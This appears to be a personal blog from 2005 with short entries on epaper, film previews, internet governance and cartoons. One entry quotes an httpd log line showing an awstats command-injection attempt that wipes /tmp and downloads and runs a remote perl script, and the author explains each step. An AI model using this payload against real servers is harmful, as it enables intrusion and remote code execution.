Grrr... I had a nice long post until acroread crashed my browser. Fuck you, Adobe! :-P

Anyway, I will recap...

Seimens has announced a low cost epaper. You know the moving pictures on the newspapers in Harry Potter? That is now a reality.

With Harry Potter having such universal appeal with children, and technology will allow us to emulate aspects of Harry Potter's world, I can't help but wonder if "witch" will be the new design crazy. Just as art deco drew on litterature from the past, will we have a Potter era of buildings?

Though it is impossibly to determine what the future hold, it hasn't stopped our ancestors from trying. Here is what generations past thought the future would be like:

Oh... I forgot to mention, I saw the preview for Doom when I went to see Serenity (go see it now!).

Ummm... You know the first person view you have in the game? That's how they do the combat scenes. The gun waving in front of the bottom of the screen as they blast the monsters.

I suspect this camera technic might be nauseating than the film in The Blair Witch Project. Hopefully they include air-sickness bagges with the cost of admission.

Internet feud?

Lately the UN and the EU have been trying to take control of the internet from the US.

The EU is now threatenning to split off with their own internet.

The US created the internet, should we give up control?

What would it mean for you if the internet fragmented? Less sites you could reach? Less spam and phishing mail reaching your mail box? Virus's isolated to a region?

I see the Korean crackers are up to their old tricks. Like this little jem I found in my httpd log file: - - [14/Oct/2005:13:47:19 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.tracknr-dhl-usa.com/sess_3539283e27d73cae29fe2b80f9293f59;perl%20sess_3539283e27d73cae29fe2b80f9293f59;echo%20;echo| HTTP/1.1" 404 1053 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

This is trying to break in through some app called "awstats" and do the following:

  • cd /tmp
Change directories to the directory used for temporary files.
  • rm -rf *
Remove all the files and directories in the /tmp directory.
  • killall -9 perl
    Kill all perl programs.
  • wget www.tracknr-dhl-usa.com/sess_3539283e27d73cae29fe2b80f9293f59
Download a bogus php session file.
  • perl sess_3539283e27d73cae29fe2b80f9293f59
The session file is a perl script, which they then run.

I saw Wallace and Grommet. It was good. I think I should have had Evan see the earlier movies first, though.

But... Before the movie was "Madagascars Penguins: The Christmas Caper". It rocked, though the personalities were a little different, like the private was a little dumber, and Ricco was a lot dumber and psychotic. But it was pretty funny.

Anyway, it's time for me to become one with my bed. Or as I like to call it, "zzzzzzzzzen". I supposed it could be argued that dreams are a form of satori.
